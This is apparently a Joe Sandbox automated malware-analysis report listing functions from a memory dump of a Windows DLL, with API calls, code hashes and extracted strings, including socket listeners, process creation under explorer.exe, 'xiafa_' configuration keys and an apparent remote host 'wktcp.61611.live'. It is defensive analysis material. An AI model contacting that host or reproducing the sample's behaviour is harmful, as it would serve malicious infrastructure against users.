                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorFreeHeapLast_free
                                                      • String ID:
                                                      • API String ID: 1353095263-0
                                                      • Opcode ID: c4f720c0c7b723e6038e199acd1e74adfd93ace1d065f47373bb1268fbd76b58
                                                      • Instruction ID: 93ea723e0ff4a37ebefb55af8edc70bf2818af01715938430097f1e814cd421c
                                                      • Opcode Fuzzy Hash: c4f720c0c7b723e6038e199acd1e74adfd93ace1d065f47373bb1268fbd76b58
                                                      • Instruction Fuzzy Hash: 80E0B635040B10DED335DA14D4517EAB7E0EF14355F10881ED083068959BB5B4898B40
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __fsopen
                                                      • String ID:
                                                      • API String ID: 3646066109-0
                                                      • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                      • Instruction ID: 13b5a6f81be809b2fbf7d3c091e96eb276c097e301d156e73de4e88552a403f5
                                                      • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                      • Instruction Fuzzy Hash: 60B0927654020C7BDE021E82EC02B49BB199B40665F008020FB0C1C261AA73A6A09689
                                                      APIs
                                                      • Sleep.KERNELBASE(00000064), ref: 1000D543
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: 3dcde9034596774b65aa007e54195beb177a1c6bf47b1e63de3ded5947083681
                                                      • Instruction ID: 41bad7438e7423b750e1fa2d8fabe618bb1bd2ce65775e71a8698d2292646254
                                                      • Opcode Fuzzy Hash: 3dcde9034596774b65aa007e54195beb177a1c6bf47b1e63de3ded5947083681
                                                      • Instruction Fuzzy Hash: 6BD0A53151491457F714A775DC0669E339CD700255F000356FC55531D4DF707D50C6D5
                                                      APIs
                                                      • socket.WS2_32(00000002,00000002,00000011), ref: 1001D950
                                                      • WSAGetLastError.WS2_32 ref: 1001D95D
                                                      • htons.WS2_32(?), ref: 1001D97D
                                                      • htonl.WS2_32(00000000), ref: 1001D98A
                                                      • setsockopt.WS2_32 ref: 1001D9B4
                                                      • setsockopt.WS2_32(00000000,0000FFFF,00001006,00001005,00000004), ref: 1001D9C8
                                                      • bind.WS2_32(00000000,?,00000010), ref: 1001D9D4
                                                      • recvfrom.WS2_32(00000000,?,00000400,00000000,?,?), ref: 1001DAB3
                                                      • WSAGetLastError.WS2_32(?,?,?), ref: 1001DABE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastsetsockopt$bindhtonlhtonsrecvfromsocket
                                                      • String ID: IP:%s ==Recv: %s$ccht$hreq$hres
                                                      • API String ID: 1368703699-1797924724
                                                      • Opcode ID: 1c73bfb027f7b528c638a0258346ea694c6c635403ffc744a9e401bed086363c
                                                      • Instruction ID: 8a38a5ddf07dcaa12e81e06f12ca4663fe6f1a20b86c72e49e58aede4ad143c3
                                                      • Opcode Fuzzy Hash: 1c73bfb027f7b528c638a0258346ea694c6c635403ffc744a9e401bed086363c
                                                      • Instruction Fuzzy Hash: E76180B1108381BEE310EB64CC85FEB7BE8EF44750F50491AF686960D1EB70E948C762
                                                      APIs
                                                      • socket.WS2_32(?,00000001,00000006), ref: 100224D7
                                                      • ioctlsocket.WS2_32(?,8004667E,?), ref: 10022520
                                                      • bind.WS2_32(?,00000002,0000001C), ref: 10022540
                                                      • SetLastError.KERNEL32(00000000), ref: 10022551
                                                      • listen.WS2_32(?,?), ref: 1002256F
                                                      • WSAGetLastError.WS2_32 ref: 100225A7
                                                      • GetLastError.KERNEL32 ref: 100225C5
                                                      • SetLastError.KERNEL32 ref: 100225DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$bindioctlsocketlistensocket
                                                      • String ID: 0.0.0.0$CTcpServer::CreateListenSocket
                                                      • API String ID: 2417606085-4023130488
                                                      • Opcode ID: f9bfeb4a8cc739fafcd06cefcd0780e203ae39d7abe803c851bd641ea0665de6
                                                      • Instruction ID: 0924c4b3d37fc36c10ea38e20b5c0763d1d4709caa76c9637eac185a656b50da
                                                      • Opcode Fuzzy Hash: f9bfeb4a8cc739fafcd06cefcd0780e203ae39d7abe803c851bd641ea0665de6
                                                      • Instruction Fuzzy Hash: 4F41B170500714AFE710EFB4E849B6BB7E9FF44305F40891EF846C6690EB75A814CB91
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog
                                                      • String ID: wktcp.61611.live$xiafa_client_min_num$xiafa_file_src$xiafa_heart_limit$xiafa_heart_times$xiafa_master_max_time$xiafa_open_win_bfe$xiafa_th_cnd_url_host$xiafa_th_cnd_url_parm$xiafa_upd_port$xiafa_wktcp_uri
                                                      • API String ID: 3519838083-3019661151
                                                      • Opcode ID: c26cc2e2d9724cc705b00cacf4f18eb540fd175cc3d86ff227f7b714cb0e39ed
                                                      • Instruction ID: e84b3c3617c25484063252d4129af66106cac9c9e1bb229d2fa69548bda7719b
                                                      • Opcode Fuzzy Hash: c26cc2e2d9724cc705b00cacf4f18eb540fd175cc3d86ff227f7b714cb0e39ed
                                                      • Instruction Fuzzy Hash: 04C19275D00219AFDB05DBA0D851AEEB3F9EF05390F118139E956AF184DB35BE84CB90
                                                      APIs
                                                        • Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
                                                        • Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC
                                                      • _TranslateName.LIBCMT ref: 1004AFEE
                                                      • _TranslateName.LIBCMT ref: 1004B039
                                                      • GetUserDefaultLCID.KERNEL32(?,?,00000055), ref: 1004B086
                                                        • Part of subcall function 1003B2C3: _wcsnlen.LIBCMT ref: 1003B304
                                                      • IsValidCodePage.KERNEL32(00000000), ref: 1004B0DA
                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 1004B0ED
                                                      • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 1004B140
                                                      • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 1004B157
                                                      • __itow_s.LIBCMT ref: 1004B169
                                                        • Part of subcall function 1004C3C8: _xtow_s@20.LIBCMT ref: 1004C3EA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Locale$InfoNameTranslateValid$CodeDefaultPageUser__amsg_exit__getptd_noexit__itow_s_wcsnlen_xtow_s@20
                                                      • String ID:
                                                      • API String ID: 199814687-0
                                                      • Opcode ID: 39c6e4449ea84833ae254ba338725754464b4196201b929d1c5f82d3ae26f83a
                                                      • Instruction ID: 4fc6a9a088543b0316f59e72052d6279c4d4c9207a0cb4644f24b7b142753181
                                                      • Opcode Fuzzy Hash: 39c6e4449ea84833ae254ba338725754464b4196201b929d1c5f82d3ae26f83a
                                                      • Instruction Fuzzy Hash: E7518171900619DEDB50EFA4CC81AAE73F8EF05341F614575E910EB191EB70EA44CBA9
                                                      APIs
                                                      • __EH_prolog.LIBCMT ref: 10010613
                                                      • CreateProcessAsUserA.ADVAPI32(00000010,00000000,00000000,00000000,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?,?,?,?,?), ref: 10010699
                                                      • CloseHandle.KERNEL32(00000010,?,?,?,?,explorer.exe,00000000,?), ref: 100106A4
                                                      • GetLastError.KERNEL32(?,?,?,?,explorer.exe,00000000,?), ref: 100106AE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseCreateErrorH_prologHandleLastProcessUser
                                                      • String ID: %s %s$D$explorer.exe
                                                      • API String ID: 421470672-2019813861
                                                      • Opcode ID: 9c2971f4b1e3e1582cbd7f665ca8fac21aa31e3dea3450054789c647ec5f8b82
                                                      • Instruction ID: 778f5603c8327821afb563841f716112cfeaecf5831ac6f29751f1640c43d1c5
                                                      • Opcode Fuzzy Hash: 9c2971f4b1e3e1582cbd7f665ca8fac21aa31e3dea3450054789c647ec5f8b82
                                                      • Instruction Fuzzy Hash: 8F117FB690021CBFEB00DFA4CD85EEE7BACEF04294F008515F945AA291DB709E04CBA4
                                                      APIs
                                                      • __time64.LIBCMT ref: 1000E9D4
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                      • Sleep.KERNEL32(000003E8,?,?,00000017,00000000,1005C7F0), ref: 1000E9F1
                                                      • __time64.LIBCMT ref: 1000EA93
                                                      • Sleep.KERNEL32(00000000), ref: 1000EA9A
                                                      • __time64.LIBCMT ref: 1000EAA2
                                                        • Part of subcall function 10011030: __EH_prolog.LIBCMT ref: 10011035
                                                        • Part of subcall function 10011030: htonl.WS2_32(?), ref: 10011095
                                                        • Part of subcall function 10011030: htonl.WS2_32(?), ref: 1001109D
                                                        • Part of subcall function 10011030: __time64.LIBCMT ref: 100110A3
                                                        • Part of subcall function 10011030: htonl.WS2_32(00000000), ref: 100110AC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __time64$htonl$SleepTime$FileH_prologSystem__aulldiv
                                                      • String ID: AB..$@#$$%DD55612
                                                      • API String ID: 1238321497-162139447
                                                      • Opcode ID: c5b1bcb94f28a798ca7a47e2918505f1331daa4b3c8216bc08fc67e608227841
                                                      • Instruction ID: 6a13c054f4f04c6358b3622b4e0ec507bf56ad0f77e34106ffcfd99f1ea0ae15
                                                      • Opcode Fuzzy Hash: c5b1bcb94f28a798ca7a47e2918505f1331daa4b3c8216bc08fc67e608227841
                                                      • Instruction Fuzzy Hash: C241A5759002409FEB05DF69C88679D7BB0FF49350F1001ADE8056F28BDB70AA40CBD1
                                                      APIs
                                                      • _wcscmp.LIBCMT ref: 1004AE6F
                                                      • _wcscmp.LIBCMT ref: 1004AE80
                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,1004B0B2,?,00000000), ref: 1004AE9C
                                                      • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,1004B0B2,?,00000000), ref: 1004AEC6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale_wcscmp
                                                      • String ID: ACP$OCP
                                                      • API String ID: 1351282208-711371036
                                                      • Opcode ID: 96948872a54df117caa813e5fff25adf86b5ae832d325085f2e4dd0d3cbf57d0
                                                      • Instruction ID: 7ca6b2f6a5d94109592f4c6cab96a781578c81931e1403feef7af7114684b216
                                                      • Opcode Fuzzy Hash: 96948872a54df117caa813e5fff25adf86b5ae832d325085f2e4dd0d3cbf57d0
                                                      • Instruction Fuzzy Hash: EC01523520451AAEE700DE66DC85ECA37D8EF066A5F218036FA15DA051E730EDC08798
                                                      APIs
                                                      • __time64.LIBCMT ref: 1000FBB4
                                                        • Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
                                                        • Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439
                                                      • __time64.LIBCMT ref: 1000FCAB
                                                      • Sleep.KERNEL32(00000000), ref: 1000FCB2
                                                      • __time64.LIBCMT ref: 1000FCBA
                                                        • Part of subcall function 10011030: __EH_prolog.LIBCMT ref: 10011035
                                                        • Part of subcall function 10011030: htonl.WS2_32(?), ref: 10011095
                                                        • Part of subcall function 10011030: htonl.WS2_32(?), ref: 1001109D
                                                        • Part of subcall function 10011030: __time64.LIBCMT ref: 100110A3
                                                        • Part of subcall function 10011030: htonl.WS2_32(00000000), ref: 100110AC
                                                        • Part of subcall function 10015F50: __EH_prolog.LIBCMT ref: 10015F55
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __time64$htonl$H_prologTime$FileSleepSystem__aulldiv
                                                      • String ID: AB..$@#$$%DD55612
                                                      • API String ID: 3909542465-162139447
                                                      • Opcode ID: 88d53e2ed8d932ee8e7c752f3a83666ed4040fa625f0a4c98bf1419b720cc872
                                                      • Instruction ID: 83ad2a1a872cda3a6c476d4eeebbf5946a8b2fcab89cd1d972a97bb11b76fb41
                                                      • Opcode Fuzzy Hash: 88d53e2ed8d932ee8e7c752f3a83666ed4040fa625f0a4c98bf1419b720cc872
                                                      • Instruction Fuzzy Hash: 06318D759002059FEB48DF68D5C2BA93BA0FF48395F1001ADEC095F68BDBB4E980DB91
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __aulldvrm
                                                      • String ID: d
                                                      • API String ID: 1302938615-2564639436
                                                      • Opcode ID: 43dd99d6499eca87f4c34a592e4b2ef59d4af46c3ac280a267a94a91c613a426
                                                      • Instruction ID: d266b9f985afb6db8acc13a87a0ad374d087afdeaf5e68828122a97f1d7468d8
                                                      • Opcode Fuzzy Hash: 43dd99d6499eca87f4c34a592e4b2ef59d4af46c3ac280a267a94a91c613a426
                                                      • Instruction Fuzzy Hash: 98E13E78E096D69EE706CF2D84900ADBF72EB65240F19C1ABC5D547322CB349622CFA5
                                                      APIs
                                                        • Part of subcall function 100416EE: __getptd_noexit.LIBCMT ref: 100416EF
                                                        • Part of subcall function 100416EE: __amsg_exit.LIBCMT ref: 100416FC
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 1004AB96
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 1004ABE3
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,000000F0), ref: 1004AC93
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoLocale$__amsg_exit__getptd_noexit
                                                      • String ID:
                                                      • API String ID: 41668988-0
                                                      • Opcode ID: 0bb00a8d9a6c8373d35bbb6a96b6db8a7a8b432b6151698ed0b66f5c6f2bd6b4
                                                      • Instruction ID: 0511ab0e65edaa7b9d0950634dd4ee18afcfe313f168562f7f8ec9952b3de98a
                                                      • Opcode Fuzzy Hash: 0bb00a8d9a6c8373d35bbb6a96b6db8a7a8b432b6151698ed0b66f5c6f2bd6b4
                                                      • Instruction Fuzzy Hash: BC51AF759002179FEB19CF25CC82BAA77E8EF06351F3080B9E901CA585EB74ED90DB58
                                                      APIs
                                                      • __time64.LIBCMT ref: 1000648C
                                                      • Sleep.KERNEL32(1005AFD8,?,00000000,00000000), ref: 100064C4
                                                      • __time64.LIBCMT ref: 100064CB
                                                      • __time64.LIBCMT ref: 10006498
                                                        • Part of subcall function 1001B9CF: __EH_prolog.LIBCMT ref: 1001B9D4
                                                        • Part of subcall function 1001B9CF: LocalAlloc.KERNEL32(00000040,?,1005D658,?,00000000,00000000,?,00000000,00000000), ref: 1001BA16
                                                        • Part of subcall function 1001B9CF: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA35
                                                        • Part of subcall function 1001B9CF: char_traits.LIBCPMT ref: 1001BA3C
                                                        • Part of subcall function 1001B9CF: LocalFree.KERNEL32(00000000,00000000,00000000,?,000000FF,00000000,?,?,00000000,00000000), ref: 1001BA4C
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_10000000_control.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __time64$Local$AllocByteCharFreeH_prologMultiSleepWidechar_traits
                                                      • String ID:
                                                      • API String ID: 1349466670-0
                                                      • Opcode ID: 2cfedc5b6727c162afb21c75015c32cc16b9b3a06868d89c3dec54bdad2cfbfb
                                                      • Instruction ID: 7cf599d640d092ba8d81afc26d70626d69daa3c1e3df8c3c9f01c42eb59162d8
                                                      • Opcode Fuzzy Hash: 2cfedc5b6727c162afb21c75015c32cc16b9b3a06868d89c3dec54bdad2cfbfb
